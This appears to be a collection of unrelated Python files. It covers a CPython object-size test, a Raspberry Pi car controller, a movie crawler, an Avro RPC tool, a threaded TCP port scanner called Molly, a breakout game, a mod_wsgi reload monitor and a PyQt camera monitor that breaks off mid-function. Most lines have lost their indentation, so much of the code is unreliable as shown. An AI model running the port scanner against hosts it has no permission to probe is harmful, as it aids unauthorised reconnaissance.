"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
if WITH_LLVM:
check(get_cell().func_code, size(h + '4i8Pi6Pc2il2P'))
else:
check(get_cell().func_code, size(h + '4i8Pi3P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
dict_llvm_suffix = ''
if WITH_LLVM:
# The last two members of the dict struct are really Py_ssize_t
# values, but struct.calcsize doesn't have a Py_ssize_t character
# code. In order to make this work on 32-bit and 64-bit platforms,
# we assume that sizeof(void*) == sizeof(Py_ssize_t), which is
# generally true, and put '2P' at the end.
dict_llvm_suffix = 'P2P'
check({}, size(h + '3P2P' + 8*'P2P' + dict_llvm_suffix))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P' + dict_llvm_suffix) + 16*size('P2P'))
del dict_llvm_suffix
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
if WITH_LLVM:
check(x, size(vh + '12P4i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
else:
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PIP') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
keyboardRunCar.py
|
import time
import RPi.GPIO as GPIO
import sys
from pynput import keyboard
import csv
##from termios import tcflush, TCIOFLUSH, TCIFLUSH
from multiprocessing import Process
from datetime import datetime
GPIO.cleanup()
Forward = 17
Backward = 27
Left = 23
Right = 24
sleeptime = 0.25
speed = 0.5
mode=GPIO.getmode()
GPIO.setmode(GPIO.BCM)
GPIO.setup(Forward, GPIO.OUT)
GPIO.setup(Backward, GPIO.OUT)
GPIO.setup(Left, GPIO.OUT)
GPIO.setup(Right, GPIO.OUT)
def forward(x):
GPIO.output(Forward, GPIO.HIGH)
print("Moving Forward")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Forward, GPIO.LOW)
def left(x):
GPIO.output(Left, GPIO.HIGH)
print("Moving Left")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Left, GPIO.LOW)
def right(x):
GPIO.output(Right, GPIO.HIGH)
print("Moving Right")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Right, GPIO.LOW)
def reverse(x):
GPIO.output(Backward, GPIO.HIGH)
print("Moving Backward")
time.sleep(x)
## sys.stdout.flush();
## tcflush(sys.stdin, TCIFLUSH)
GPIO.output(Backward, GPIO.LOW)
'''
def runInParallel(*fns):
proc = []
for fn in fns:
global p
p = Process(target=fn, args=(speed,))
p.start()
proc.append(p)
#for p in proc:
# p.join()
while not p.empty():
p.get()
'''
def on_press(key):
try:
with open("controls.csv","a") as filename:
fieldnames = ['images','controls']
writer = csv.DictWriter(filename, fieldnames=fieldnames)
if (key.char == 's'):
print("speed")
reverse(sleeptime)
elif(key.char == 'w'):
forward(sleeptime)
elif(key.char == 'a'):
left(sleeptime)
elif(key.char == 'd'):
right(sleeptime)
elif(key.char == 'q'):
'''runInParallel(forward,left)
p.terminate()'''
forward(sleeptime)
left(sleeptime+0.10)
'''p1 = Process(target=forward, args=(speed,))
p1.start()
p2 = Process(target=left, args=(speed,))
p2.start()
#p1.join()
#p2.join()
p1.get()
p2.get()
#p1.terminate()'''
elif(key.char == 'e'):
forward(sleeptime)
right(sleeptime+0.10)
timestamp = datetime.now()
writer.writerows([{'images': str(timestamp), 'controls': key.char}])
    except AttributeError:
        print('special key {0} pressed'.format(key))
def on_release(key):
if (key == keyboard.Key.esc):
return False
if __name__ =='__main__':
try:
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
finally:
print("closed")
GPIO.cleanup()
|
MovieInfo.py
|
#coding: utf-8
import threading
from startThreads import ThreadMain
from Config import maxThread
from Downloader import DownloadMoviesInfo
def moviesInfo(URLS):
threads = []
    # crawl movie information with multiple threads
while threads or URLS:
for thread in threads:
if not thread.is_alive():
threads.remove(thread)
while len(threads) < maxThread and URLS:
url = URLS.pop()
            thread = threading.Thread(target=DownloadMoviesInfo, args=(url, ))
            thread.start()
            # don't join here: joining inside the spawn loop would serialise the
            # downloads and defeat the multithreading this function is meant to do
            threads.append(thread)
if __name__ == "__main__":
moviesInfo(["http://www.gewara.com/movie/323882374", ])
|
tool.py
|
#!/usr/bin/env python3
# -*- mode: python -*-
# -*- coding: utf-8 -*-
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
class GenericResponder(avro.ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = open(proto, 'rb').read()
avro.ipc.Responder.__init__(self, avro.protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = avro.ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = avro.ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urllib.parse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = http.server.HTTPServer(server_addr, GenericHandler)
print("Port: %s" % server.server_port)
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urllib.parse.urlparse(uri)
client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = open(proto, 'rb').read()
requestor = avro.ipc.Requestor(avro.protocol.parse(proto_json), client)
print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
return sys.stdin if f == '-' else open(f, 'rb')
def main(args=sys.argv):
if len(args) == 1:
print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
return 1
if args[1] == "dump":
if len(args) != 3:
print("Usage: %s dump input_file" % args[0])
return 1
for d in avro.datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
print(repr(d))
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision "
"with the python io module. Try doing `python -m avro.tool` instead.")
sys.exit(main(sys.argv))
|
molly.py
|
from queue import Queue
from threading import Thread, Event
import click
import os
import time
import sys
import socket
from .utils import is_ip_v4
from .constants import FIRST_1000_PORTS, ALL_PORTS, TOP_20_PORTS, VERSION
class Molly():
def __init__(self, target, mode, workers):
self.hostname = target
self.mode = mode
self.target = self._parse_target(target)
self.queue = Queue()
self.open_ports = []
self.closed_ports = []
self.max_workers = workers
self.exit_signal = Event()
self.start_time = None
self.end_time = None
def get_ports_to_scan(self):
if self.mode == 'basic':
self._add_ports_to_queue(FIRST_1000_PORTS)
elif self.mode == 'full':
self._add_ports_to_queue(ALL_PORTS)
elif self.mode == 'common':
self._add_ports_to_queue(TOP_20_PORTS)
elif self.mode == 'custom':
ports = self._get_custom_port_range()
self._add_ports_to_queue(ports)
else:
raise ValueError(f'Unexpected value for --mode option: {self.mode}')
def _scan(self):
while not self.queue.empty() and not self.exit_signal.is_set():
port = self.queue.get()
connection_descriptor = self._connect(port)
if connection_descriptor == 0:
self.open_ports.append(port)
click.echo(f'Port {port} is open')
else:
self.closed_ports.append(port)
def run_scan(self):
click.echo(f'Running scan (Mode: {self.mode}) ...')
self.start_time = time.time()
threads = []
for _ in range(self.max_workers):
t = Thread(target=self._scan)
threads.append(t)
t.start()
        try:
            for t in threads:
                t.join()
        except KeyboardInterrupt:
            self.exit_signal.set()
            click.echo('\nExiting ...')
            self._send_report()
            sys.exit(1)
        self._send_report()
def _add_ports_to_queue(self, ports):
if isinstance(ports, int):
for port in range(1, ports):
self.queue.put(port)
elif isinstance(ports, list):
for port in ports:
self.queue.put(port)
elif isinstance(ports, tuple):
start = ports[0]
end = ports[1]
for port in range(start, end):
self.queue.put(port)
def _parse_target(self, target):
if is_ip_v4(target):
return target
else:
try:
_target = socket.gethostbyname(target)
except socket.gaierror:
sys.exit(f'[Error] No Address Associated With Hostname. ({target})')
else:
return _target
    def _connect(self, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(.5)
        result = s.connect_ex((self.target, port))
        s.close()
        return result
def _send_report(self):
self.end_time = time.time()
self.open_ports = list(map(str, self.open_ports))
click.echo(f'\nMolly Scan Report for {self.target} ({self.hostname})')
click.echo('-' * 40)
click.echo(f'Found {len(self.closed_ports)} closed ports.\n')
click.echo(f'Found {len(self.open_ports)} open ports: \n')
if len(self.open_ports) != 0:
click.echo(' \n'.join(self.open_ports))
click.echo(f'\nMolly done: 1 IP scanned (1 Host Up) {self.total_ports_scanned} ports scanned in {self._compute_scan_time()} seconds.')
def _compute_scan_time(self):
elapsed_time = self.end_time - self.start_time
return f'{elapsed_time:.2f}'
def _get_custom_port_range(self):
port_range = click.prompt('Please select a range of ports (separated by a comma)', type=str)
port_range = port_range.replace(' ', '').split(',')
port_range = tuple(filter(str, port_range))
try:
port_range = tuple(map(int, port_range))
if len(port_range) < 2:
sys.exit(f'[Error]: Port range should be TWO numbers, separated by a comma. You provided {port_range}')
except ValueError:
sys.exit(f'[Error]: Illegal value for port range, you provided {port_range}')
else:
if port_range[0] > port_range[1]:
sys.exit(f'[Error]: Start port cannot be bigger than the last port. You provided {port_range}')
return port_range
@property
def total_ports_scanned(self):
return len(self.open_ports + self.closed_ports)
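# Minimal usage sketch (illustrative only; the real entry point lives in the
# package CLI). The target and worker count below are arbitrary example values.
def example_scan():
    scanner = Molly(target='127.0.0.1', mode='common', workers=10)
    scanner.get_ports_to_scan()
    scanner.run_scan()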
|
game.py
|
from random import *
import common as var
import blocks as bs
from graphics import *
import threading
from sound import *
def movePlayer(win, key, player, speed):
if key == 'Left' and player.getAnchor().getX() > 50:
player.move(-speed, 0)
if key == 'Right' and player.getAnchor().getX() < 550:
player.move(speed, 0)
def startBall():
return randint(0, 1)
def checkCollisions(win, dir, gameVariables, rad):
d = ["LU", "RU", "RD", "LD"]
ballX = gameVariables[var.ball].getCenter().getX()
ballY = gameVariables[var.ball].getCenter().getY()
playerX = gameVariables[var.player].getAnchor().getX()
playerY = gameVariables[var.player].getAnchor().getY()
'''Collisions with the boundaries of the play area'''
if d[dir] == "LU" and ballX - rad <= 0:
dir = changeDirection('+', dir)
if d[dir] == "LU" and ballY - rad <= 0:
dir = changeDirection('-', dir)
if d[dir] == "RU" and ballX + rad >= 600:
dir = changeDirection('-', dir)
if d[dir] == "RU" and ballY - rad <= 0:
dir = changeDirection('+', dir)
if d[dir] == "RD" and ballX + rad >= 600:
dir = changeDirection('+', dir)
if d[dir] == "RD" and ballY + rad >= 790:
return -1
if d[dir] == "LD" and ballX - rad <= 0:
dir = changeDirection('-', dir)
if d[dir] == "LD" and ballY + rad >= 790:
return -1
'''Collisions with the paddle'''
if d[dir] == "RD":
if ballY + rad >= playerY - (var.playerHeight /2) and ballY + rad <= playerY + (var.playerHeight /2):
if ballX + rad >= playerX - (var.playerLength /2) and ballX + rad <= playerX + (var.playerLength /2):
thread = threading.Thread(target=playPaddleSound)
thread.start() #Sound of ball hitting the paddle
dir = changeDirection('-', dir)
if d[dir] == "LD":
if ballY + rad >= playerY - (var.playerHeight /2) and ballY + rad <= playerY + (var.playerHeight /2):
if ballX + rad >= playerX - (var.playerLength /2) and ballX + rad <= playerX + (var.playerLength /2):
thread = threading.Thread(target=playPaddleSound)
thread.start() #Sound of ball hitting the paddle
dir = changeDirection('+', dir)
'''Collisions with individual blocks'''
aux = 0
for b in gameVariables[var.blocks]:
if d[dir] == "LU" or d[dir] == "LD":
bX = b.getP2().getX()
bY = b.getP2().getY()
else:
bX = b.getP1().getX()
bY = b.getP1().getY()
if d[dir] == "LU": #DONE
if ballX <= bX and ballX >= bX - var.block_width:
if ballY - rad <= bY and ballY - rad >= bY - rad:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX - rad <= bX and ballX - rad >= bX - rad:
if ballY <= bY and ballY >= bY - var.block_height:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "RU": #DONE
if ballX >= bX and ballX <= bX + var.block_width:
if ballY - rad <= bY + var.block_height and ballY - rad >= (bY + var.block_height) - rad:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX + rad >= bX and ballX + rad <= bX + rad:
if ballY >= bY and ballY <= bY + var.block_height:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "RD": #DONE
if ballX >= bX and ballX <= bX + var.block_width:
if ballY + rad >= bY and ballY + rad <= bY + rad:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX + rad >= bX and ballX + rad <= bX + rad:
if ballY >= bY and ballY <= bY + var.block_height:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if d[dir] == "LD": #DONE
if ballX <= bX and ballX >= (bX - var.block_width):
if ballY + rad >= bY - var.block_height and ballY + rad <= (bY - var.block_height) + rad:
dir = changeDirection('+', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
if ballX - rad <= bX and ballX - rad >= bX - rad:
if ballY <= bY and ballY >= bY - var.block_height:
dir = changeDirection('-', dir)
bs.addPoints(win, aux, gameVariables)
bs.removeBlock(aux, gameVariables)
break
aux += 1
return dir
def changeDirection(rate, dir):
if rate == '-':
dir -= 1
else:
dir += 1
if dir < 0:
return 3
if dir > 3:
return 0
return dir
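def _direction_examples():
    # Illustrative only: the direction codes index into ["LU", "RU", "RD", "LD"];
    # '+' rotates clockwise through the list and '-' counter-clockwise, wrapping
    # at both ends.
    assert changeDirection('+', 0) == 1  # LU -> RU
    assert changeDirection('-', 0) == 3  # LU -> LD (wraps around)
    assert changeDirection('+', 3) == 0  # LD -> LU (wraps around)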
def moveBall(dir, speed, gameVariables):
directions = ["LU", "RU", "RD", "LD"]
if directions[dir] == "LU":
gameVariables[var.ball].move(-speed, -speed)
if directions[dir] == "RU":
gameVariables[var.ball].move(speed, -speed)
if directions[dir] == "RD":
gameVariables[var.ball].move(speed, speed)
if directions[dir] == "LD":
gameVariables[var.ball].move(-speed, speed)
def showPause(win):
menu = Image(Point(300, 400), "../resources/pause_menu.gif")
menu.draw(win)
return menu
def closePause(menu):
menu.undraw()
def resumeButton(mouse):
if mouse != None:
if mouse.getX() >= 196 and mouse.getX() <= 396:
if mouse.getY() >= 390 and mouse.getY() <= 450:
return True
else:
return False
else:
return False
def mainMenuButton(mouse):
if mouse != None:
if mouse.getX() >= 196 and mouse.getX() <= 396:
if mouse.getY() >= 470 and mouse.getY() <= 525:
return True
else:
return False
else:
return False
|
web_monitor.py
|
"""
Monitor files and kill mod_wsgi processes if any files change
Details here -- http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode#Restarting_Daemon_Processes
Added the ability to track directories
"""
import os
import sys
import time
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path)
print >> sys.stderr, '%s Triggering process restart.' % prefix
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
# If path doesn't denote a file and were previously
# tracking it, then it has been removed or the file type
# has changed so force a restart. If not previously
# tracking the file then we can ignore it as probably
# pseudo reference such as when file extracted from a
# collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
    except:
        # If any exception occurred, the file has likely been
        # removed just before stat(), so force a restart.
return True
return False
def _monitor():
while 1:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except:
pass
_thread.join()
atexit.register(_exiting)
def _get_files_from_dir(dir):
basedir = dir
subdirlist = []
for item in os.listdir(dir):
item_full_path = os.path.join(basedir, item)
if os.path.isfile(item_full_path):
if not item_full_path in _files:
_files.append(item_full_path)
else:
subdirlist.append(item_full_path)
for subdir in subdirlist:
_get_files_from_dir(subdir)
def track(path):
if os.path.isfile(path):
if not path in _files:
_files.append(path)
else:
_get_files_from_dir(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Starting change monitor.' % prefix
_running = True
_thread.start()
_lock.release()
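# Usage sketch (illustrative; the path below is a placeholder, not taken from a
# real deployment). In a mod_wsgi WSGI script this module is imported once,
# extra files or directories are registered with track(), and the monitor
# thread is started with start().
def example_setup():
    track('/tmp')
    start(interval=1.0)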
|
monitor.py
|
# coding:utf-8
# 2018.3.5
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from pojo import POJO
import os
import utils
import cv2
import socket
import numpy as np
from configuration import ConfigInjection
from threading import Event, Thread
import time
from caculate_handler import CaculateHandler
try:
_fromUtf8 = QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QApplication.translate(context, text, disambig)
# Controls the processing flow; holds a reference to the window instance it drives
class MonitorController():
def __init__(self, _window):
self._window = _window
self._window.connect(self._window.start, SIGNAL("clicked()"), self.start_spy)
self._window.connect(self._window.logout, SIGNAL("clicked()"), self.close_window)
        self.load_config()  # load the configuration file
self.load_socket_config()
self._cap = cv2.VideoCapture(self.streamAddr) # self.config.streamAddr
self._abnormal_type = ["\n明火识别", "\n煤粉、煤灰\n 或粉尘识别", "\n液体(水、油) \n识别", "\n气体、蒸汽 \n识别", "\n无异常"]
self._abnormal_index = 4
self._main_timer = QTimer()
        self._main_timer.timeout.connect(self.monitor)  # connect the timeout signal to the main monitor slot
        self._warning_timer = QTimer()
        self._warning_timer.timeout.connect(self.warning)  # warning blink feature
        self._abnormal_labels = [self._window.ablabel1, self._window.ablabel2]  # initialise the abnormal-image display labels
        self._abnormal_pics = [None, None]  # initialise the abnormal-image objects
self.ABSPATH = str(os.getcwd())
self._pic_save_path = os.path.join(self.ABSPATH, 'save')
if not os.path.exists(self._pic_save_path):
os.mkdir(self._pic_save_path)
self.eles_init()
self._notify_event = Event()
self._send_thread = Thread(target=self.send_msg)
self._send_thread.setDaemon(True)
self._send_thread.start()
    # Main entry point of the processing loop
def start_spy(self):
self._main_timer.start(40)
if self._click_flag:
self._window.start.setText(_translate("Form", "Pause", None))
self._click_flag = not self._click_flag
else:
self._window.start.setText(_translate("Form", "Start", None))
self._click_flag = not self._click_flag
self._main_timer.stop()
    def monitor(self):
        success, image = self._cap.read()
        if not self._cap.isOpened():
            self._cap = cv2.VideoCapture(self.streamAddr)
            success, image = self._cap.read()
        if image is not None:
image_copy = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if success:
self._cnt += 1
if self._cnt == 10:
self._handler.baseImg.append(image_copy)
self._handler.add_diff_value(image_copy)
# self._handler.add_candidate_img(image_copy)
# cv2.rectangle(image, (480, 360), (1440, 900), (255, 0, 0))
show_img = QImage(image.data, image.shape[1], image.shape[0], QImage.Format_RGB888)
photo = QPixmap.fromImage(show_img)
self._images.append(photo)
n = len(self._images)
if n >= 9:
                    tmp = self._images[n - 9:n]  # keep only the most recent QPixmaps to bound the cache
del self._images
self._images = tmp
if len(self._images) >= 9:
                    flag, self._abnormal_rois, self._draw_index = self._handler.hasAbnormal()
if flag or self._is_real_normal:
if self._cnt_flag < 8:
self._handler.check_bg(image_copy)
self._is_real_normal = True
self._cnt_flag += 1
else:
self._is_real_normal = False
print "现在可能有异常了,前面的处理完了没--"
ab_pixmap = self._images[4]
updated_candidate = self._handler.img_to_candidate()
self._cnt_flag = 0
if self._step2_processed: # second process finish
print "可以处理新的数据了--------"
if self._handler.candidate_valid():
self._step2_processed = False
if updated_candidate:
